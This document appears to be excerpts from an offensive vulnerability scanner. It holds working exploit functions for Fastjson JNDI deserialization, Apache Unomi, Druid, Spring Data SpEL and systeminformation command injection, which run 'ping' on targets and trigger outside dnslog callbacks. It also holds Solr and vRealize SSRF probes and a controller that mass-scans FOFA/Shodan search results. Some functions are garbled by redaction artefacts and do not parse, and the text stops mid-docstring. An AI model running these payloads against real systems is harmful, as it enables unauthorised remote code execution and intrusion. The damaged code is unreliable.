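 def fastjson_1224_poc(self) -> None:
     """Probe for the Fastjson <= 1.2.24 autoType deserialization RCE (CVE-2017-18349).

     Sends a ``com.sun.rowset.JdbcRowSetImpl`` gadget whose JNDI
     ``dataSourceName`` points at a freshly allocated dnslog domain.  A
     vulnerable server resolves that name while trying to reach the LDAP
     server, and ``dns_result`` reports the callback.  Nothing is returned:
     findings go into ``self.vul_info`` and are printed through ``verify``.

     Caveats: TLS verification is deliberately off (``verify=False``), and a
     DNS hit only proves that the target resolved the name - no LDAP object is
     ever served, so "PoCSuCCeSS" is an out-of-band indicator of the
     deserialization path, not a confirmed code execution.

     Changes from the previous revision: the recorded payload is exactly the
     string that was sent (it used to carry a stray ``"] "`` suffix), the
     request-level catch no longer swallows ``KeyboardInterrupt`` /
     ``SystemExit``, and the thread lock is released in ``finally`` so a
     failure inside a ``verify`` printer cannot leave other threads blocked.
     """
     self.threadLock.acquire()
     try:
         self.vul_info.update({
             "prt_name": "Fastjson: 1.2.24",
             "prt_resu": "null",
             "prt_info": "null",
             "vul_payd": "null",
             "vul_urls": self.url,
             "vul_name": "Fastjson 反序列化远程代码执行漏洞",
             "vul_numb": "CVE-2017-18349",
             "vul_apps": "Fastjson",
             "vul_date": "2017-03-15",
             "vul_vers": "<= 1.2.24",
             "vul_risk": "high",
             "vul_type": "远程代码执行",
             "vul_data": "null",
             "vul_desc": "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码",
             "cre_date": "2021-01-20",
             "cre_auth": "zhzyker",
         })
         headers = {
             'User-Agent': self.ua,
             'Content-Type': "application/json",
             'Connection': 'close'
         }
         # One dnslog token per probe: it is both the DNS name the target must
         # resolve and the key that dns_result is polled with afterwards.
         md = dns_request()
         jndi_url = "ldap://" + md + "//Exploit"
         data = json.dumps({
             "b": {
                 "@type": "com.sun.rowset.JdbcRowSetImpl",
                 "dataSourceName": jndi_url,
                 "autoCommit": True
             }
         })
         try:
             try:
                 request = requests.post(self.url,
                                         data=data,
                                         headers=headers,
                                         timeout=self.timeout,
                                         verify=False)
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
             except Exception:
                 # Best effort: the JNDI lookup (and so the DNS callback) can
                 # fire even when the HTTP exchange itself errors or times out,
                 # so keep going and let dns_result decide.
                 pass
             if dns_result(md):
                 self.vul_info["vul_payd"] = jndi_url
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[dns] [payload: " + jndi_url + "] "
             verify.scan_print(self.vul_info)
         # The POST is already caught above, so these handlers only see
         # failures raised while talking to the dnslog platform.
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         self.threadLock.release()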
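 def fastjson(self, webapps_identify, url) -> None:
     """Fingerprint Fastjson behind ``url`` and append "fastjson" to ``webapps_identify``.

     Three signals are tried in order: (1) a truncated JSON body
     (``payload5``) that makes Fastjson leak its ``JSONException`` class name
     in the error page; (2) a JSON ``Content-Type`` on that error response;
     (3) if neither matches, four out-of-band autoType probes
     (``Inet4Address`` / ``URL``) pointing at a dnslog domain, confirmed via
     ``dns_result``.  Every error is swallowed: identification is best effort
     and must never abort the surrounding scan.  Returns nothing.

     Changes from the previous revision: a response without a ``Content-Type``
     header used to raise ``KeyError`` and silently skip the DNS probes, and a
     failed first request used to surface as an unbound ``request`` name; both
     paths are now explicit.
     """
     name = "Fastjson"
     Identify.identify_prt(name)
     dns = dns_request()
     payload1 = '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' %dns
     payload2 = '{"@type":"java.net.Inet4Address","val":"%s"}' %dns
     payload3 = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' %dns
     payload4 = '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' %dns
     payload5 = '{"a":"'
     headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'}
     try:
         try:
             request = requests.post(url, data=payload5, headers=headers, timeout=self.timeout, verify=False)
         except Exception:
             # No response at all: nothing to fingerprint, and the OOB probes
             # would hit the same dead endpoint.
             return
         # Missing header -> empty string, so the comparisons below fall
         # through to the DNS probes instead of raising.
         content_type = request.headers.get('Content-Type', '')
         if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text:
             if r"application/json" == content_type:
                 webapps_identify.append("fastjson")
         elif r"application/json" in content_type:
             webapps_identify.append("fastjson")
         else:
             # Out-of-band fallback: any of these makes a Fastjson with
             # autoType reachable resolve the dnslog name.
             for probe in (payload1, payload2, payload3, payload4):
                 requests.post(url, data=probe, headers=headers, timeout=self.timeout, verify=False)
             if dns_result(dns):
                 webapps_identify.append("fastjson")
                 webapps_identify.append("fastjson [" + dns + "]")
     except Exception:
         # Deliberately silent: fingerprinting must not break the scan.
         pass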
 def cve_2020_13942_poc(self) -> None:
     """Check Apache Unomi (< 1.5.2) for CVE-2020-13942, MVEL/OGNL expression injection RCE.

     POSTs ``self.payload_cve_2020_13942`` to ``/context.json`` with its
     ``RECOMMAND`` placeholder replaced by ``ping <dnslog-domain>`` - note that
     this really runs a command on the target, so stay within authorised scope.
     A DNS callback marks the target ``PoCSuCCeSS``; otherwise a
     ``trackedConditions[0].parameterValues.pagePath`` containing ``/tracker/``
     downgrades the verdict to ``PoC_MaYbE`` (a weak, response-shape heuristic).
     Sets ``self.payload`` / ``self.headers`` as a side effect, reports through
     ``verify`` and returns nothing.
     """
     self.threadLock.acquire()
     info = self.vul_info
     info.update({
         "prt_name": "Apache Unomi: CVE-2020-13942",
         "prt_resu": "null",
         "prt_info": "null",
         "vul_urls": self.url,
         "vul_payd": self.payload_cve_2020_13942.replace("RECOMMAND", "whoami"),
         "vul_name": "Apache Unomi remote code execution",
         "vul_numb": "CVE-2020-13942",
         "vul_apps": "Unomi",
         "vul_date": "2020-11-23",
         "vul_vers": "< 1.5.2",
         "vul_risk": "high",
         "vul_type": "远程代码执行",
         "vul_data": "null",
         "vul_desc": ("攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,"
                      "漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过,"
                      "攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"),
         "cre_date": "2021-01-28",
         "cre_auth": "zhzyker",
     })
     token = dns_request()
     cmd = "ping " + token
     self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
     self.headers = {
         'User-Agent': self.ua,
         'Accept': '*/*',
         'Connection': 'close',
         'Content-Type': 'application/json'
     }
     try:
         resp = requests.post(self.url + "/context.json",
                              data=self.payload,
                              headers=self.headers,
                              timeout=self.timeout,
                              verify=False)
         if dns_result(token):
             info["vul_data"] = dump.dump_all(resp).decode('utf-8', 'ignore')
             info["prt_resu"] = "PoCSuCCeSS"
             info["prt_info"] = "[dns] [cmd:" + cmd + "]"
         else:
             # Fallback heuristic on the response body; any parse/shape error
             # lands in the generic handler below.
             tracked = list(json.loads(resp.text)["trackedConditions"])
             page_path = tracked[0]["parameterValues"]["pagePath"]
             if r"/tracker/" in page_path:
                 info["vul_data"] = dump.dump_all(resp).decode('utf-8', 'ignore')
                 info["prt_resu"] = "PoC_MaYbE"
                 info["prt_info"] = "[maybe]"
         verify.scan_print(info)
     except requests.exceptions.Timeout:
         verify.timeout_print(info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(info["prt_name"])
     except Exception:
         verify.error_print(info["prt_name"])
     self.threadLock.release()
 def cve_2021_27905_poc(self) -> None:
     """Check Apache Solr for CVE-2021-27905 (ReplicationHandler ``masterUrl`` SSRF).

     Lists cores via ``/solr/admin/cores`` to pick a core name, then asks that
     core's ReplicationHandler to ``fetchindex`` from ``http://<dnslog>/``; a
     DNS callback for that name is taken as proof of the SSRF.  Results are
     written to ``self.vul_info`` and printed via ``verify``; returns nothing.

     NOTE(review): this listing is damaged - the ``payload`` line has had the
     basic-auth user/password values redacted to ``"******"`` and the rest of
     the ``.replace(...)`` chain fused onto it, so the block does not parse
     as-is.  The code is kept byte-identical here; restore it from the
     upstream source rather than from this copy.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
     self.vul_info["vul_numb"] = "CVE-2021-27905"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2021-04-14"
     self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "SSRF"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
     # Unlike the sibling PoCs no "cre_date" is recorded for this entry.
     self.vul_info["cre_auth"] = "zhzyker"
     # Filled from the cores listing; stays None when that listing is unusable.
     core_name = None
     dns = dns_request()
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             # First key of the "status" object is the first core name.
             core_name = list(json.loads(request.text)["status"])[0]
         except:
             pass
         # NOTE(review): if core_name is still None here, str.replace(..., None)
         # raises TypeError and the target is reported as an error, not a miss.
         # The "******" below is a redaction artefact, not the original code.
         payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
                   "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
         url_ssrf = urljoin(self.url, payload)
         r = requests.get(url_ssrf,
                          headers=self.headers,
                          timeout=self.timeout,
                          verify=False)
         # NOTE(review): the other PoCs test the truthiness of dns_result(); this
         # one tests membership in its return value.  If the helper returns a
         # bool, `dns in True` raises TypeError and a real hit becomes an
         # error_print - confirm the helper's return type.
         if dns in dns_result(dns):
             self.vul_info["vul_payd"] = url_ssrf
             self.vul_info["vul_data"] = dump.dump_all(r).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
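 def fastjson_1262_poc(self) -> None:
     """Probe for the Fastjson <= 1.2.62 autoType bypass via ``JndiConverter`` (no CVE recorded).

     Sends an ``org.apache.xbean.propertyeditor.JndiConverter`` object whose
     ``AsText`` is an LDAP URL on a freshly allocated dnslog domain; a server
     that still autoTypes the class performs the JNDI lookup and resolves the
     name, which ``dns_result`` then reports.  Findings go into
     ``self.vul_info`` and are printed through ``verify``; nothing is returned.

     Caveats: TLS verification is off (``verify=False``), and a DNS hit only
     shows the lookup happened - no LDAP object is served, so "PoCSuCCeSS" is
     an out-of-band indicator rather than a confirmed code execution.

     Changes from the previous revision: the recorded payload is the exact
     string that was sent (it used to report ``//Exploit`` with a stray
     ``"] "`` while actually sending ``//exploit``), the request-level catch no
     longer swallows ``KeyboardInterrupt`` / ``SystemExit``, and the thread
     lock is released in ``finally``.
     """
     self.threadLock.acquire()
     try:
         self.vul_info.update({
             "prt_name": "Fastjson: 1.2.62",
             "prt_resu": "null",
             "prt_info": "null",
             "vul_payd": "null",
             "vul_urls": self.url,
             "vul_name": "Fastjson 反序列化远程代码执行漏洞",
             "vul_numb": "null",
             "vul_apps": "Fastjson",
             "vul_date": "2019-10-07",
             "vul_vers": "<= 1.2.62",
             "vul_risk": "high",
             "vul_type": "远程代码执行",
             "vul_data": "null",
             "vul_desc": ("官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险"
                          "(autoType功能默认关闭),另建议将JDK升级到最新版本。"),
             "cre_date": "2021-01-21",
             "cre_auth": "zhzyker",
         })
         headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
         # One dnslog token per probe: the DNS name the target must resolve and
         # the key dns_result is polled with.
         md = dns_request()
         jndi_url = "ldap://" + md + "//exploit"
         data = json.dumps({
             "@type": "org.apache.xbean.propertyeditor.JndiConverter",
             "AsText": jndi_url
         })
         try:
             try:
                 request = requests.post(self.url,
                                         data=data,
                                         headers=headers,
                                         timeout=self.timeout,
                                         verify=False)
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
             except Exception:
                 # Best effort: the JNDI lookup can still fire when the HTTP
                 # exchange errors or times out, so let dns_result decide.
                 pass
             if dns_result(md):
                 self.vul_info["vul_payd"] = jndi_url
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[dns] [payload: " + jndi_url + "] "
             verify.scan_print(self.vul_info)
         # The POST is already caught above; these see dnslog-platform failures.
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         self.threadLock.release()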
 def cve_2021_25646_poc(self) -> None:
     """Check Apache Druid (< 0.20.1) for CVE-2021-25646, JavaScript-filter RCE via the sampler API.

     POSTs ``self.payload_cve_2021_25646`` to ``/druid/indexer/v1/sampler`` with
     ``RECOMMAND`` replaced by ``ping <dnslog-domain>``; a DNS callback marks
     the target ``PoCSuCCeSS``.  This really executes a command on the target
     (a ``ping``), so run it only within an authorised scope.  Output goes to
     ``self.vul_info`` / ``verify``; nothing is returned.
     """
     self.threadLock.acquire()
     info = self.vul_info
     info.update({
         "prt_name": "Apache Druid: CVE-2021-25646",
         "prt_resu": "null",
         "prt_info": "null",
         "vul_urls": self.url,
         "vul_payd": "null",
         "vul_name": "Apache Druid 远程代码执行漏洞",
         "vul_numb": "CVE-2021-25646",
         "vul_apps": "Druid",
         "vul_date": "2021-02-01",
         "vul_vers": "< 0.20.1",
         "vul_risk": "high",
         "vul_type": "远程代码执行漏洞",
         "vul_data": "null",
         "vul_desc": ("Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。"
                      "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,"
                      "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。"
                      "攻击者可直接构造恶意请求执行任意代码,控制服务器。"),
         "cre_date": "2021-02-03",
         "cre_auth": "zhzyker",
     })
     endpoint = urljoin(self.url, "/druid/indexer/v1/sampler")
     headers = {
         'Content-Type': 'application/json',
         'User-Agent': self.ua,
         'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
         'Connection': 'keep-alive'
     }
     token = dns_request()
     cmd = "ping " + token
     body = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
     try:
         resp = requests.post(endpoint,
                              data=body,
                              headers=headers,
                              timeout=self.timeout,
                              verify=False)
         if dns_result(token):
             info["vul_data"] = dump.dump_all(resp).decode('utf-8', 'ignore')
             info["vul_payd"] = body
             info["prt_resu"] = "PoCSuCCeSS"
             info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
         verify.scan_print(info)
     except requests.exceptions.Timeout:
         verify.timeout_print(info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(info["prt_name"])
     except Exception:
         verify.error_print(info["prt_name"])
     self.threadLock.release()
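 def cve_2021_21975_poc(self) -> None:
     """Check VMware vRealize Operations Manager (<= 8.3.0) for the CVE-2021-21975 SSRF.

     POSTs ``["<dnslog-domain>"]`` to ``/casa/nodes/thumbprints``; the endpoint
     makes the appliance connect to the listed host, so a DNS callback for that
     name confirms the SSRF.  Results go to ``self.vul_info`` / ``verify``;
     returns nothing.

     Changes from the previous revision: ``vul_numb`` now records
     CVE-2021-21975 - it used to say CVE-2021-21972, a different VMware
     advisory, contradicting ``prt_name`` and this method's own name - and the
     thread lock is released in ``finally`` so a failing ``verify`` printer
     cannot leave other scanner threads blocked.
     """
     self.threadLock.acquire()
     try:
         self.vul_info.update({
             "prt_name": "VMware vRealize Operations Manager: CVE-2021-21975",
             "prt_resu": "null",
             "prt_info": "null",
             "vul_urls": self.url,
             "vul_payd": "null",
             "vul_name": "VMware vRealize Operations Manager API SSRF",
             "vul_numb": "CVE-2021-21975",
             "vul_apps": "Vmware",
             "vul_date": "2021-03-31",
             "vul_vers": "<= 8.3.0",
             "vul_risk": "high",
             "vul_type": "SSRF",
             "vul_data": "null",
             "vul_desc": "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击",
             "cre_date": "2021-04-01",
             "cre_auth": "zhzyker",
         })
         try:
             headers = {
                 "User-Agent": self.ua,
                 "Content-Type": "application/json;charset=UTF-8"
             }
             dns = dns_request()
             # The body is a JSON array of hostnames the appliance will contact.
             data = '["' + dns + '"]'
             url = urljoin(self.url, "/casa/nodes/thumbprints")
             res = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
             if dns_result(dns):
                 self.vul_info["vul_data"] = dump.dump_all(res).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["vul_payd"] = data
                 self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]"
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         self.threadLock.release()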
    def cve_2021_21315_poc(self) -> None:
        """Check a Node.js app using ``systeminformation`` (< 5.3.1) for CVE-2021-21315.

        Requests ``/api/getServices?name[]=$(ping%20<dnslog-domain>)``; the
        unsanitised ``name`` array reaches a shell, so a DNS callback confirms
        the injection (and means a command really ran on the target - stay
        within authorised scope).  Output goes to ``self.vul_info`` / ``verify``;
        nothing is returned.

        The GET uses a fixed 3-second timeout rather than ``self.timeout``, and
        any request failure is swallowed (``vul_data`` then stays ``"null"``) so
        that the dnslog check still runs.
        """
        self.threadLock.acquire()
        info = self.vul_info
        info.update({
            "prt_name": "Node.JS: CVE-2021-21315",
            "prt_resu": "null",
            "prt_info": "null",
            "vul_urls": self.url,
            "vul_payd": "null",
            "vul_name": "Node.JS Command Injection",
            "vul_numb": "CVE-2021-21315",
            "vul_apps": "Node.JS",
            "vul_date": "2021-02-25",
            "vul_vers": "Systeminformation < 5.3.1",
            "vul_risk": "high",
            "vul_type": "Command Injection",
            "vul_data": "null",
            "vul_desc": "CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection",
            "cre_date": "2021-03-04",
            "cre_auth": "zhzyker",
        })
        headers = {
            "User-agent": self.ua,
            "Connection": "close"
        }

        token = dns_request()
        cmd = "ping%20" + token
        payload = "/api/getServices?name[]=$(RECOMMAND)".replace("RECOMMAND", cmd)
        target = self.url + payload
        try:
            try:
                resp = requests.get(target, headers=headers, timeout=3, verify=False)
                raw = dump.dump_all(resp).decode('utf-8', 'ignore')
            except:
                # Best effort: the injected ping may still fire even if the
                # HTTP side failed, so keep the placeholder and check dnslog.
                raw = "null"
            if dns_result(token):
                info["vul_data"] = raw
                info["prt_resu"] = "PoCSuCCeSS"
                info["vul_payd"] = payload
                info["prt_info"] = "[dns] [payload:" + target + " ]"
            verify.scan_print(info)
        except requests.exceptions.Timeout:
            verify.timeout_print(info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(info["prt_name"])
        except Exception:
            verify.error_print(info["prt_name"])
        self.threadLock.release()
 def cve_2018_1273_poc(self) -> None:
     """Check Spring Data Commons for CVE-2018-1273 (SpEL injection through property paths).

     Builds a form body whose ``username[...]`` key is a SpEL expression that
     calls ``Runtime.exec("ping <dnslog-domain>")`` - a real command on the
     target; a DNS callback marks it ``PoCSuCCeSS``.  Results go to
     ``self.vul_info`` / ``verify``; the method returns nothing.

     NOTE(review): this listing is damaged.  The ``payload`` line has been
     secret-redacted (``'******'``) and the request, the ``dns_result`` check
     and the ``vul_data`` assignment that followed it were fused onto that
     same line, so the block does not parse.  Code is kept byte-identical
     below; take the real body from the upstream source.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2018-1273"
     self.vul_info["vul_apps"] = "Spring"
     self.vul_info["vul_date"] = "2018-04-11"
     self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程命令执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \
                                 "攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。"
     self.vul_info["cre_date"] = "2021-01-26"
     self.vul_info["cre_auth"] = "zhzyker"
     # dnslog token doubles as the hostname the injected ping must resolve.
     md = dns_request()
     cmd = "ping " + md
     # Redaction artefact: everything from '******' onward belonged to later
     # statements (headers/POST/dns_result) in the original file.
     payload = 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' + cmd + '")]=&password=&repeatedPassword='******'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = payload
             self.vul_info["prt_info"] = "[dns] [rce] [payload: " + payload + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
    def control_options(args) -> None:  # Option controller: handles every parsed CLI option
        """Validate the parsed CLI options and dispatch the scan or exploit run.

        Order of work: proxy setup, informational banners, dnslog availability,
        output-file collision checks, then one of the ``poc`` entry points
        (single URL, target file, FOFA search, Shodan search) or the ``exp``
        path.  Every usage error ends the process with ``exit(0)`` - note that
        this reports *success* to the calling shell.

        ``args`` is the parsed argument namespace; attributes read below:
        socks, http, list, thread_num, vul, mode, debug, O_TEXT, O_JSON, url,
        file, app, fofa, size, shodan.  Returns nothing.
        """
        delay = globals.get_value("DELAY")  # Global print delay used by the timed prefixes below
        now_warn = now.timed(de=delay) + color.red_warn()
        if args.socks:
            proxy_set(args.socks, "socks")  # proxy support socks5 http https
        elif args.http:
            proxy_set(args.http, "http")  # proxy support socks5 http https
        # NOTE(review): the list banner fires when args.list is False.  That is
        # only right if argparse declares the flag with action="store_false";
        # confirm against the parser, otherwise the test is inverted.
        if args.list is False:  # Show the supported-vulnerability list
            print(now.timed(de=0) + color.yel_info() + color.yellow(" List of supported vulnerabilities"))
            print(vul_list())
        if args.thread_num != 10:  # Announce a non-default thread count
            print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num)))
        if args.vul is not None:  # -v selects a single exploit, which forces exp mode
            args.mode = "exp"
        # Same store_false caveat as args.list above.
        if args.debug is False:  # --debug handling
            print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information"))
            globals.set_value("DEBUG", "debug")  # Global DEBUG flag read elsewhere
        #ceye_api()  # (disabled) ceye connectivity test
        if dns_request(): # Initialise the dnslog platform and check it answers
            pass
        else:
            print(now_warn + color.red(" Dnslog platform (hyuga.co dnslog.cn ceye.io) is not available"))
        # Refuse to overwrite an existing output file.  NOTE(review): exit(0)
        # on an error path signals success to the shell; exit(1) is the
        # conventional choice.  The text branch's message also says "json file"
        # (runtime string, left as-is here).
        if args.O_TEXT:  # text output requested
            if os.path.isfile(args.O_TEXT):
                print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_TEXT + "] already exists"))
                exit(0)
        if args.O_JSON:  # json output requested
            if os.path.isfile(args.O_JSON):
                print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists"))
                exit(0)
        if args.mode is None or args.mode == "poc":  # Default mode is poc
            if args.url is not None and args.file is None:  # -u only: scan a single URL
                args.url = url_check(args.url)  # Normalise the URL format
                if survival_check(args.url) == "f":  # Liveness probe; "f" means unreachable
                    print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + args.url))
                    exit(0)  # A single dead target ends the run
                print(now.timed(de=0) + color.yel_info() + color.cyan(" Start scanning target: " + args.url))
                # Both branches make the identical call; the only difference is
                # RUNALLPOC, which marks a sweep over every webapp.
                if args.app is None:
                    globals.set_value("RUNALLPOC", True)  # Single URL, all webapps
                    core.control_webapps("url", args.url, args.app, "poc")
                else:  # Single URL, one webapp
                    core.control_webapps("url", args.url, args.app, "poc")
            elif args.file is not None and args.url is None:  # -f only: batch scan a target file
                if os.path.isfile(args.file):
                    print(now.timed(de=0) + color.yel_info() + color.cyan(" Start batch scanning target: " + args.file))
                else:  # Missing file: report and exit
                    print(now.timed(de=0) + color.red_warn() + color.red(" Not found target file: " + args.file))
                    exit(0)
                if args.app is None:
                    globals.set_value("RUNALLPOC", "FILE")  # Batch scan, all webapps
                    core.control_webapps("file", args.file, args.app, "poc")
                else:  # Batch scan, one webapp
                    core.control_webapps("file", args.file, args.app, "poc")
            elif args.url is None and args.file is None and args.fofa is not None:  # FOFA api search
                print(now.timed(de=0) + color.yel_info() + color.yellow(" Use fofa api to search [" + args.fofa + "] and start scanning"))
                if r"xxxxxx" in globals.get_value("fofa_key"):  # Placeholder credentials still in the config
                    print(now.timed(de=0) + color.red_warn() + color.red(" Check fofa email is xxxxxx Please replace key and email"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://fofa.so/user/users/info find key and email"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" How to use key and email reference https://github.com/zhzyker/vulmap"))
                    exit(0)
                else:
                    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa email: " + globals.get_value("fofa_email")))
                    # NOTE(review): echoes the full FOFA API key to stdout; anything
                    # capturing the terminal (CI logs, tee, screen share) then holds
                    # the credential.  Mask it, or print only its last few characters.
                    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa key: " + globals.get_value("fofa_key")))
                fofa_list = fofa(args.fofa, args.size)  # Target list from the FOFA api (default 100)
                # Both branches are identical; no RUNALLPOC flag is set here,
                # unlike the url/file paths.
                if args.app is None:
                    core.control_webapps("fofa", fofa_list, args.app, "poc")
                else:
                    core.control_webapps("fofa", fofa_list, args.app, "poc")

            elif args.url is None and args.file is None and args.shodan is not None:  # Shodan api search
                print(now.timed(de=0) + color.yel_info() + color.yellow(" Use shodan api to search [" + args.shodan + "] and start scanning"))
                if r"xxxxxx" in globals.get_value("shodan_key"):  # Placeholder key still in the config
                    print(now.timed(de=0) + color.red_warn() + color.red(" Check shodan key is xxxxxx Please replace key"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://account.shodan.io/ find key"))
                    print(now.timed(de=0) + color.red_warn() + color.red(" How to use key reference https://github.com/zhzyker/vulmap"))
                    exit(0)
                else:
                    # NOTE(review): same credential-to-stdout concern as the FOFA key.
                    print(now.timed(de=0) + color.yel_info() + color.yellow(" Shodan key: " + globals.get_value("shodan_key")))
                shodan_list = shodan_api(args.shodan)  # Target list from the Shodan api (default 100)
                # Both branches are identical; see the FOFA note above.
                if args.app is None:
                    core.control_webapps("shodan", shodan_list, args.app, "poc")
                else:
                    core.control_webapps("shodan", shodan_list, args.app, "poc")

            if args.O_TEXT:
                print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT))
            if args.O_JSON:
                print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON))
        elif args.mode == "exp":  # Exploit mode takes fewer options
            if args.vul is not None and args.url is not None:  # -v and -u are both required
                core.control_webapps("url", args.url, args.vul, "exp")
            else:
                print(now_warn + color.red(" Options error, -v must specify -u"))
        else:
            print(now_warn + color.red(" Options error ... ..."))
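 def cve_2017_12629_poc(self) -> None:
     """Check Apache Solr (< 7.1.0) for CVE-2017-12629, RCE via ``RunExecutableListener``.

     Enumerates cores through ``/solr/admin/cores``, then POSTs
     ``self.payload_cve_2017_12629`` to ``/solr/<core>/config`` with
     ``RECOMMAND`` -> ``ping <dnslog-domain>`` and ``new_core`` -> a random
     name.  A DNS callback gives ``PoCSuCCeSS``; otherwise a 200 on the core
     listing plus a usable core name gives the weaker ``PoC_MaYbE``.  Results
     go to ``self.vul_info`` / ``verify``; nothing is returned.

     Operational caveats: the config POST adds a listener to the target's
     live Solr config (a persistent change the scanner does not undo) and the
     listener really runs a command, so stay within authorised scope.

     NOTE(review): the first statement rewrites
     ``http.client.HTTPConnection._http_vsn_str`` - a private attribute shared
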